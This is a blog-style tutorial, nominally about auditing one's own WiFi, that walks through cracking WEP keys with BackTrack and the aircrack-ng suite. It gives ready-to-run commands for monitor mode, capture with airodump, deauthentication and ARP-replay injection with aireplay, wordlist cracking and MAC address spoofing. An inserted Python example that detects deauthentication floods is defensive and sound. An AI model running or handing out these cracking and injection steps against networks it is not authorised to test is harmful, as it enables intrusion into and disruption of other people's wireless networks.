Very important: check whether your own WiFi LAN is secure. You need some tools to perform these actions. The easiest way to get them is to download and burn the BackTrack CD ISO file, then boot your computer from the CD. Slax (the live-CD version of Slackware) is used as the OS. Most of the tools you need for the job run on Linux, not on Windows, and there are a lot of neat tools on this CD.
As I'm learning more I'll update this post now and then. Have fun!
Not all WiFi interfaces are suitable for all the actions described in this article. For example, my Intel PRO/Wireless 2200BG card cannot 'inject' packets using the aireplay command explained later on. I can use special open-source drivers, but the card's firmware still drops most packets. This makes cracking a WEP key much more time consuming and less interesting. Check that you have the right chipset, such as Atheros or Prism.
You need to switch your WLAN card into monitor mode. The regular Windows drivers provided by the manufacturer will NOT support this feature; you need special drivers. Wildpackets.com provides those drivers for free, but only for a limited range of cards, so check their website for supported hardware. After you have installed those drivers, you can use Airodump. There is one drawback on the Windows platform: no packet injection is supported. There are some commercial tools available, but (I think) they need a special driver too, so forget it. You need two additional files to run Airodump, peek.dll and peek5.sys, available from wildpackets.com: download the evaluation version of AiroPeek NX and install it, and you'll find those two files there. Be aware that the Windows version of Airodump is not 100% stable; from time to time, when you close Airodump, peek5.sys causes a BSOD (Blue Screen Of Death), and the reason is still unknown. And don't put your laptop into sleep mode while Airodump is running, as you will get a BSOD as well! To run Aircrack you need this file: cygwin1.dll.
VMWare for Windows
It should work, but only with USB wireless NICs. This is due to a VMware limitation that doesn't allow direct hardware access: your PC Card would be mapped as a regular NIC. I can't test this, as I don't own a USB wireless NIC.
The easiest way is to use a live distribution like Auditor or BackTrack. Those distributions are bootable from CD and packed with all the tools and drivers you need. I'm using the Proxim Orinoco card 8480-WD; to set this card into monitor mode, you need the madwifi driver (Auditor 2.0, for example, uses the ath_pci driver, which does not support monitor mode). As you can see, it's not that simple. Check this site for a complete WLAN Adapter Chipset Directory (ok, a bit outdated…). Get the BackTrack distro from here.
To crack a WEP key, you need to collect a lot of IVs. The Aircrack readme provides these lines:
How do I crack a static WEP key?
The basic idea is to capture as much encrypted traffic as possible using Airodump. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run Aircrack on the resulting capture file.
How many IVs are required to crack WEP?
WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000 IVs; if you're out of luck you may need two million IVs, or more.
WEP Key Crack
Prepare the interface
slax ~ # ifconfig eth0 up
slax ~ # iwconfig eth0 mode monitor
Depending on your distribution, you need a different command to set the card into monitor mode:
# iwpriv ath0 monitor 2 1 (enables monitor mode)
# iwpriv ath0 monitor 0 1 (disables monitor mode)
Search for your WiFi network information
slax ~ # airodump-ng -c 11 -w /root/airodump eth0
Run the next two commands at the same time
slax ~ # aireplay-ng -0 25 -a <MAC address AP> -c <MAC address wifi-client> eth0
slax ~ # aireplay-ng --arpreplay -b <MAC address AP> -h <MAC address wifi-client> eth0
The first command (-0) sends deauthentication frames so the client reassociates with the AP; the second replays the client's ARP requests to the AP, which answers each one with a new encrypted packet, and so a new IV.
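As an added example (not part of the original post), here is a small Python detector for the defender's side of the deauthentication step above: it parses the 802.11 MAC header of captured frames and alerts when a single source sends a burst of deauthentication frames inside a short window. The frames, MAC addresses and timestamps are constructed inline, with no radiotap header in front; a real monitor-mode capture would first have to strip its radiotap or prism header.

```python
# Added example, not from the original post: flag deauthentication bursts
# (what "aireplay-ng -0 25" produces) in a monitor-mode capture.
from collections import defaultdict, deque

MGMT, DEAUTH = 0, 12   # 802.11 type 0 = management, subtype 12 = deauthentication


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(m):
    return bytes.fromhex(m.replace(":", ""))


def parse_frame(raw):
    """Decode the fixed 802.11 MAC header; assumes no radiotap header in front."""
    fc = raw[0]                      # frame control byte 0: subtype | type | version
    return {"type": (fc >> 2) & 0x3, "subtype": fc >> 4,
            "dst": mac_str(raw[4:10]), "src": mac_str(raw[10:16]),
            "bssid": mac_str(raw[16:22])}


def build_frame(ftype, subtype, dst, src, bssid, body=b""):
    """Build a minimal frame for the constructed sample capture below."""
    fc = bytes([(subtype << 4) | (ftype << 2), 0])
    return fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00" + body


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: (timestamp_seconds, raw_bytes). Returns (src, bssid, ts) alerts,
    one per source each time `threshold` deauths land inside `window` seconds."""
    recent = defaultdict(deque)
    alerts = []
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        hdr = parse_frame(raw)
        if hdr["type"] != MGMT or hdr["subtype"] != DEAUTH:
            continue
        q = recent[hdr["src"]]
        q.append(ts)
        while ts - q[0] > window:        # drop deauths older than the window
            q.popleft()
        if len(q) == threshold:          # fire once when the window fills up
            alerts.append((hdr["src"], hdr["bssid"], ts))
    return alerts


# Constructed sample: one normal data frame, then 25 deauths spoofed from the AP
# (reason code 7) at 10 ms intervals, mirroring the -0 25 step above.
AP, CLIENT = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
SAMPLE = [(0.0, build_frame(2, 0, AP, CLIENT, AP, b"payload"))]
SAMPLE += [(0.5 + i * 0.01, build_frame(MGMT, DEAUTH, CLIENT, AP, AP, b"\x07\x00"))
           for i in range(25)]

if __name__ == "__main__":
    for src, bssid, ts in detect_deauth_flood(SAMPLE):
        print(f"deauth flood from {src} on BSSID {bssid} at t={ts:.2f}s")
```

A burst from the AP's own address is expected here, since the frames are spoofed; a legitimate AP deauthenticating one client sends a handful of frames, not dozens per second.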
Find the key using a wordlist
slax ~ # zcat /pentest/password/dictionaries/wordlist.txt.Z >> /tmp/wordlist.txt
slax ~ # gunzip wordlist.txt.Z
slax ~ # aircrack-ng -w /tmp/wordlist.txt /root/airodump-01.cap
Configure your WLAN interface to use a WPA key
# wpa_passphrase <ssid> <key> >> /etc/wpa_supplicant.conf
# wpa_supplicant -w -i <INTERFACE> [-D <driver>] -B -c /etc/wpa_supplicant.conf
Connect LAN interface to your network
# ifconfig eth1 up
# dhcpcd eth1
# ifconfig eth1
Fake your MAC address
Use the Macshift tool to change your MAC address:
> macshift 001122334455 -i "Wireless Network Connection 2"
The original Macshift website is here.
slax ~ # ifconfig ath0 down
slax ~ # ifconfig ath0 hw ether 00:11:22:33:44:55
slax ~ # ifconfig ath0 up